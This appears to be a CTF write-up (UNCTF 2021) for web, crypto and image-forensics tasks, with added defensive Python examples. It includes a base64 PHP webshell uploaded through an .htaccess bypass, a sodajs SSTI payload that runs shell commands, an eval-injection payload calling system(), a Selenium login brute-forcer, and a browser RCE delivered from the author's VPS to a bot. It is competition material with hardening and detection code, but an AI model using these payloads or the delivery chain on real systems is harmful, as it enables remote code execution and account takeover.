Brute-force an integer whose MD5 starts with 666666; after that the usual steps give the flag.
import hashlib

# Brute-force integers until the MD5 hex digest begins with 666666.
for a in range(1, 1000000000):
    c = hashlib.md5(str(a).encode("utf-8")).hexdigest()
    if c[0:6] == '666666':
        print(a)
        # print(c)
<?php
highlight_file(__FILE__);
// One sandbox directory per client IP.
$sandbox = md5($_SERVER['REMOTE_ADDR']);
if (!is_dir($sandbox)) {
    mkdir($sandbox);
}
if (isset($_GET['filename']) && isset($_GET['content'])) {
    $filename = $_GET['filename'];
    $content = $_GET['content'];
    // Blacklist on the name: no "ph", no "..", no "/", at most 10 characters.
    if (preg_match_all("/ph|\.\.|\//i", $filename) || strlen($filename) > 10) {
        die("No way!");
    }
    // Blacklist on the body: no "<?" and no "ph".
    if (preg_match_all("/<\?|ph/", $content)) {
        die("No way!");
    }
    $filename = $sandbox . "/" . $filename;
    @file_put_contents($filename, $content);
    echo $filename;
}
Upload .htaccess:
?filename=.htaccess&content=AddType application/x-httpd-p\%0Ahp .png%0Ap\%0Ahp_value a\%0Auto_append_file "p\%0Ahp://filter/convert.b\%0Aase64-decode/resource=a.png"
Upload a.png:
PD9waHAgZXZhbCgkX1BPU1Rbc2FwXSk7Pz4=
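Why the two blacklists above do not hold, as an added example that is not part of the writeup or the challenge: the original regexes are re-implemented in Python and run against the two uploads shown, next to an allowlist check (plain basename, known image extension, body starting with that type's magic bytes). The MAGIC table, the function names and the upload bodies are constructed here; the bodies are the URL-decoded forms of the two payloads above.

```python
import re
from urllib.parse import unquote

# Constructed allowlist of image magic bytes (assumption: the sandbox is meant for images).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

def original_filter(filename: str, content: str) -> bool:
    """The challenge's own blacklist, re-implemented with the same regexes."""
    if re.search(r"ph|\.\.|/", filename, re.I) or len(filename) > 10:
        return False
    if re.search(r"<\?|ph", content):
        return False
    return True

def hardened_filter(filename: str, content: bytes) -> bool:
    """Allowlist instead: plain basename, known image extension, body starts with that type's magic."""
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,10}\.(png|jpg|gif)", filename)
    if m is None:                       # rejects dotfiles (.htaccess), separators, unknown extensions
        return False
    return content.startswith(MAGIC[m.group(1)])

# The two uploads from this writeup, URL-decoded as PHP would see them (constructed strings).
HTACCESS_BODY = unquote(
    'AddType application/x-httpd-p\\%0Ahp .png%0Ap\\%0Ahp_value a\\%0Auto_append_file '
    '"p\\%0Ahp://filter/convert.b\\%0Aase64-decode/resource=a.png"'
)
PNG_BODY = "PD9waHAgZXZhbCgkX1BPU1Rbc2FwXSk7Pz4="

def demo():
    """Original filter passes both uploads; the allowlist rejects both and still accepts a real PNG."""
    return {
        "htaccess_original": original_filter(".htaccess", HTACCESS_BODY),
        "htaccess_hardened": hardened_filter(".htaccess", HTACCESS_BODY.encode()),
        "png_original": original_filter("a.png", PNG_BODY),
        "png_hardened": hardened_filter("a.png", PNG_BODY.encode()),
        "real_png_hardened": hardened_filter("a.png", MAGIC["png"] + b"\x00" * 16),
    }

if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```

The blacklist fails because Apache joins a line ending in a backslash with the next one, so "ph" never appears as a contiguous substring in the stored file, and because nothing stops a dotfile from being written. Input filtering is only the second line of defence here: the upload directory should also be served with AllowOverride None and no script handler, so that a stray .htaccess has no effect at all.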
Type in something random and the error page reveals sodajs; look up the sodajs SSTI and build a payload (fine, I borrowed it):
{{ " ".toString.constructor("return global.process.mainModule.constructor._load('child_process').execSync('ls').toString()")() }}
Then cat /flag.
<?php
show_source(__FILE__);
echo("欢迎来到unctf2021,have fun"."\n");
$db_host=$_POST['host'];
$db_user=$_POST['user'];
$db_pwd=$_POST['pwd'];
$db_port=$_POST['port'];
if($db_host==""){
    die("数据库地址不能为空!");
}
if(is_numeric($db_host)){
    echo("fakeflag is /flag"."\n");
    // The three values are checked for ; | & before they reach system().
    if(preg_match("/;|\||&/is",$db_user) || preg_match("/;|\||&/is",$db_pwd) || preg_match("/;|\||&/is",$db_port)){
        die("嘉然今天吃什么");
    }
    system("mysql -h $db_host -u $db_user -p $db_pwd -P $db_port --enable-local-infile");
}
else{
    echo("Maybe you can do someting else"."\n");
    if(!isset($db_user) || !isset($db_pwd)){
        eval("echo new Exception(\"\");");
    }
    else{
        // Class name and constructor argument are interpolated straight into eval().
        $db_user = str_ireplace("SplFileObject", "UNCTF2021", $db_user);
        eval("echo new $db_user($db_pwd);");
    }
}
Note the two controllable parameters at the end:
$db_user = str_ireplace("SplFileObject", "UNCTF2021", $db_user);
eval("echo new $db_user($db_pwd);");
Get RCE through the exception error output; ctfshow covers this technique.
Payload:
host=c&pwd=system("tac /fllllaaaaag")&user=exception
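A small detector for the pattern behind this challenge, added here as an example and not part of the writeup or the challenge: it scans PHP source for eval() calls whose double-quoted string argument interpolates a variable, which is exactly how the class name and constructor argument above reach the interpreter. The snippet it scans is copied from the source shown above; the regexes and function names are my own.

```python
import re

# Constructed: the relevant lines of the challenge source shown above.
PHP_SNIPPET = r'''
if(!isset($db_user) || !isset($db_pwd)){
    eval("echo new Exception(\"\");");
}
else{
    $db_user = str_ireplace("SplFileObject", "UNCTF2021", $db_user);
    eval("echo new $db_user($db_pwd);");
}
'''

# eval( "..." ) with a double-quoted literal argument; the group tolerates \" escapes inside it.
EVAL_RE = re.compile(r'eval\s*\(\s*"((?:[^"\\]|\\.)*)"')
# PHP variables that PHP would interpolate into that double-quoted literal.
VAR_RE = re.compile(r'\$[A-Za-z_]\w*')

def find_interpolated_eval(src):
    """Return [(line_no, [variables])] for every eval() whose string argument interpolates a variable."""
    findings = []
    for n, line in enumerate(src.splitlines(), 1):
        m = EVAL_RE.search(line)
        if m:
            names = VAR_RE.findall(m.group(1))
            if names:
                findings.append((n, names))
    return findings

if __name__ == "__main__":
    for line_no, names in find_interpolated_eval(PHP_SNIPPET):
        print(f"line {line_no}: eval() interpolates {', '.join(names)}")
```

The first eval() (a constant string) is not reported; the second is, with both variables. A single str_ireplace() of one class name does not change that finding: the fix is to never assemble code from request data, and to instantiate classes from a fixed allowlist map with new $cls(...) instead of eval().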
The challenge says:
I can tell you my name is admin and my password is made by number only. This time, you can not to buster my password :)
The password is digits only, but it is encrypted by JavaScript on the client; the obfuscation could not be undone and Burp could not brute-force it, so here is the script:
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

if __name__ == '__main__':
    # Selenium 3 style: point at the chromedriver binary directly.
    browser = webdriver.Chrome(executable_path=r"D:\Program Files\Google\Chrome\Application\chromedriver.exe")
    browser.get("http://0578b386-07e3-45c0-8eee-97b1f3546d01.node1.hackingfor.fun/login.php")
    try:
        # Wait until the login form's submit button is present.
        WebDriverWait(browser, 10).until(
            EC.presence_of_element_located((By.XPATH, '//*[@id="submit"]'))
        )
    except Exception as e:
        browser.quit()
        exit(1)
    browser.execute_script("document.querySelector('#username').value='admin'")
    for password in range(999999):
        # password=1234
        browser.execute_script(
            "document.querySelector('#password').value='%s';document.querySelector('#submit').click()" % (
                str(password)))
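Why client-side encryption does not protect a six-digit password, and what does, as an added example that is not part of the writeup: the browser-driven loop above is simulated against a constructed credential check, once without and once with a server-side failure counter that locks the account after a few failed attempts. LoginThrottle, check_password, simulate_bruteforce, the secret "1234" and the limits are all assumptions made for this example.

```python
import time
from collections import defaultdict

class LoginThrottle:
    """Refuse further attempts on an account after max_failures failures within lockout_seconds."""
    def __init__(self, max_failures=5, lockout_seconds=300, clock=time.monotonic):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.clock = clock                    # injectable for tests
        self.failures = defaultdict(list)     # account -> timestamps of recent failures

    def allowed(self, account):
        now = self.clock()
        recent = [t for t in self.failures[account] if now - t < self.lockout_seconds]
        self.failures[account] = recent
        return len(recent) < self.max_failures

    def record(self, account, success):
        if success:
            self.failures[account].clear()
        else:
            self.failures[account].append(self.clock())

def check_password(account, candidate, secret="1234"):
    """Constructed stand-in for the real credential check."""
    return account == "admin" and candidate == secret

def simulate_bruteforce(throttle=None, space=1_000_000):
    """Try every digit string 0..space-1, as the Selenium loop above does.
    Returns (password_found_or_None, number_of_attempts_the_server_actually_checked)."""
    attempts = 0
    for p in range(space):
        if throttle is not None and not throttle.allowed("admin"):
            return None, attempts             # locked out: the server stops checking
        attempts += 1
        ok = check_password("admin", str(p))
        if throttle is not None:
            throttle.record("admin", ok)
        if ok:
            return str(p), attempts
    return None, attempts

if __name__ == "__main__":
    print("no throttle:", simulate_bruteforce())
    print("with throttle:", simulate_bruteforce(LoginThrottle()))
```

Obfuscating the JavaScript changes nothing about the 10^6 search space, because the automation simply drives the page's own code. The counter has to live on the server; a per-IP limit alone is weaker than a per-account one, since the automation can come from many addresses.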
The hint says to pay attention to the User-Agent. I put the address of my own XSS platform on a VPS into it and let the bot visit; that captured the Chrome version and the OS, and a Baidu search turned up a remote code execution 0day for that version. Open viper and add a listener payload.
Slightly modify the contents of the generated C file to replace the shellcode in the original exploit, turning it into
Then put it on the VPS and start a server:
python3 -m http.server xxxx (port number)
Once it is up, fill in the vps:xxxx address and let the bot take its screenshot, i.e. visit it, and the session comes back successfully.
After that, grab the flag.
A base64 string; decode it.
Mutated Caesar
#!/usr/bin/env python
# coding:utf-8

def b_kaisa(mstr):
    j = 4
    lmstr = []
    for i in range(len(mstr)):
        m = ord(mstr[i])  # take the ASCII code of the i-th ciphertext character
        m = m + j         # add the current shift j
        lmstr.append(m)   # store the shifted code in the list lmstr
        j = j + 1         # the shift grows by one per character
    return lmstr

if __name__ == '__main__':
    m_str = 'qi]m^roVibdVbXUU`h'  # ciphertext
    lstr = b_kaisa(m_str)
    for i in lstr:
        print(chr(i), end='')
A very tedious height fix: compute the hexadecimal value, find it in the file and change it.
Nothing stood out at first; strings shows a reversed base64 string, and decoding it gives:
佛日:上俱故。遠大密隸怯除多皤孕耨爍梵地諳薩侄究缽老諳不想皤者滅罰輸缽阿侄滅梵夢侄不冥吉真梵沙缽度即缽隸怯明侄切侄知呐地南呼舍咒奢佛涅哆姪神密明哆逝室地恐冥呼怯佛喝哆伽都怯遮諳倒缽帝冥帝輸曰諳麼俱怖俱苦俱波
Annoyingly, the character here is 日 rather than 曰; correct it and you get the flag.
Open the image with tweakpng; the incorrect CRC value, converted, gives the archive password, EDGnb!! Opening it yields a Bilibili link and a screenshot showing a timestamp; I guessed danmaku or comments, found the comment at the corresponding time, and got the flag.
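The check tweakpng performs in the CRC task above, and the height repair from the earlier image task, written out as an added example that is not part of the writeup: parse_ihdr reads the PNG IHDR chunk and recomputes its CRC over the chunk type and data, and recover_height searches for the height value that makes the stored CRC match again. The 640x480 header and the tampering are constructed inline; function names and the search bound are assumptions.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def build_ihdr(width, height, bit_depth=8, color_type=2):
    """Build a valid IHDR chunk: length, type, 13 data bytes, CRC32 over type+data."""
    data = struct.pack(">IIBBBBB", width, height, bit_depth, color_type, 0, 0, 0)
    crc = zlib.crc32(b"IHDR" + data) & 0xFFFFFFFF
    return struct.pack(">I", 13) + b"IHDR" + data + struct.pack(">I", crc)

def parse_ihdr(png):
    """Read IHDR (the first chunk after the 8-byte signature) and recompute its CRC."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    length, ctype = struct.unpack(">I4s", png[8:16])
    data = png[16:16 + length]
    stored = struct.unpack(">I", png[16 + length:20 + length])[0]
    width, height = struct.unpack(">II", data[:8])
    actual = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return {"width": width, "height": height, "stored_crc": stored,
            "actual_crc": actual, "crc_ok": stored == actual}

def recover_height(png, max_height=10000):
    """If the stored CRC does not match, find the height (below max_height) that makes it match."""
    info = parse_ihdr(png)
    if info["crc_ok"]:
        return info["height"]
    data = bytearray(png[16:29])            # the 13 IHDR data bytes; height sits at offset 4
    for h in range(1, max_height):
        struct.pack_into(">I", data, 4, h)
        if zlib.crc32(b"IHDR" + bytes(data)) & 0xFFFFFFFF == info["stored_crc"]:
            return h
    return None

def demo():
    """Constructed 640x480 header, then the height shrunk to 100 without updating the CRC."""
    good = PNG_SIG + build_ihdr(640, 480)
    tampered = bytearray(good)
    struct.pack_into(">I", tampered, 20, 100)   # absolute offset of the height field
    return parse_ihdr(bytes(tampered)), recover_height(bytes(tampered))

if __name__ == "__main__":
    info, height = demo()
    print(info)
    print("recovered height:", height)
```

A CRC mismatch on IHDR is the usual sign that width or height was edited by hand; because only the height is unknown, a linear search over plausible values finds the original in milliseconds, whereas the stored CRC itself (as in the archive-password task) carries no information about the image.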